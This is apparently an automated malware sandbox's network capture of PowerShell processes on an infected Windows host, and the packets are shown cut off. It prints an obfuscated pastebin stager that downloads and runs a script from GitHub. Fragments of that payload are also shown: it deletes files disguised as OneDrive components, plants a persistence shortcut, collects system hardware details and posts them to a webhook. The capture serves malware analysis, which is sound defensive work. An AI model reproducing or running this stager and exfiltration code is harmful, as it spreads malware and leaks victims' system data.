Expires: Tue, 15 Oct 2024 14:05:12 GMT
Vary: Authorization,Accept-Encoding


Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49762 | Destination IP: 185.199.109.133 | Destination Port: 80 | PID: 7352 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:12.246316910 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 16:00:12.861293077 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 14:00:12 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210128-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000813.797048,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:05:12 GMT
Vary: Authorization,Accept-Encoding


Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 52112 | Destination IP: 104.20.3.235 | Destination Port: 80 | PID: 5844 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:39.598272085 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 16:00:40.208422899 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 14:00:40 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 15:00:40 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d305632da4f474e-DFW
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 52120 | Destination IP: 185.199.109.133 | Destination Port: 80 | PID: 5844 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:41.185332060 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 16:00:41.791990995 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 14:00:41 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120086-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000842.728637,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:05:41 GMT
Vary: Authorization,Accept-Encoding


Session ID: 10 | Source IP: 192.168.2.7 | Source Port: 52153 | Destination IP: 104.20.3.235 | Destination Port: 80 | PID: 4240 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:47.067806959 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 16:00:47.667251110 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 14:00:47 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 15:00:47 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d3056617d816c37-DFW
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID: 11 | Source IP: 192.168.2.7 | Source Port: 52162 | Destination IP: 185.199.109.133 | Destination Port: 80 | PID: 4240 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:00:48.734690905 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 16:00:49.334247112 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 14:00:49 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120119-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000849.272230,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:05:49 GMT
Vary: Authorization,Accept-Encoding


Session ID: 0 | Source IP: 192.168.2.7 | Source Port: 49753 | Destination IP: 104.20.3.235 | Destination Port: 443 | PID: 6448 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:11 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 14:00:12 UTC | 397 | IN | HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 14:00:11 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 461
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d305581fd912cd0-DFW
2024-10-15 14:00:12 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:00:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49754 | Destination IP: 104.20.3.235 | Destination Port: 443 | PID: 7180 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:11 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 14:00:12 UTC | 397 | IN | HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 14:00:11 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 461
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d3055820e9c474b-DFW
2024-10-15 14:00:12 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:00:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49752 | Destination IP: 104.20.3.235 | Destination Port: 443 | PID: 7352 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:11 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 14:00:12 UTC | 397 | IN | HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 14:00:11 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 461
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d3055820d012e71-DFW
2024-10-15 14:00:12 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:00:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49755 | Destination IP: 104.20.3.235 | Destination Port: 443 | PID: 7172 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:00:11 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 14:00:12 UTC | 397 | IN | HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 14:00:11 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 461
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d3055822d912e1f-DFW
2024-10-15 14:00:12 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:00:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.749769185.199.109.1334437180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:14 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:14 UTC901INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:14 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120107-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000814.164888,VS0,VE3
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: fea4fcae6ca70ebe74ead29d8656c720b34000e2
                                                                Expires: Tue, 15 Oct 2024 14:05:14 GMT
                                                                Source-Age: 20
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii (line breaks restored):
                                                                sleep 5
                                                                rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
                                                                sleep 5
                                                                $googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                if (-Not (Test-Path $googoogaagaa)) {
                                                                rm $env:tmp\onedrivefilesync.dll -force
                                                                New-ItemPropert
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii (line breaks restored):
                                                                cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors
                                                                # Retrieve GPU information
                                                                $gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:14 UTC  618  IN  Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii (line breaks restored):
                                                                ======================
                                                                "@
                                                                } | ConvertTo-Json
                                                                # Send the POST request to the webhook URL
                                                                try {
                                                                    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
                                                                    Write-Output "Message sent successfully."
                                                                } catch {
                                                                    W


                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                5  192.168.2.7  49770  185.199.109.133  443  6448  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Timestamp  Bytes transferred  Direction  Data
                                                                2024-10-15 14:00:14 UTC  222  OUT  GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:14 UTC  901  IN  HTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:14 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210167-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000814.165803,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: 1f41d85daf4b1962869cd606e3ca947d2409ff70
                                                                Expires: Tue, 15 Oct 2024 14:05:14 GMT
                                                                Source-Age: 20
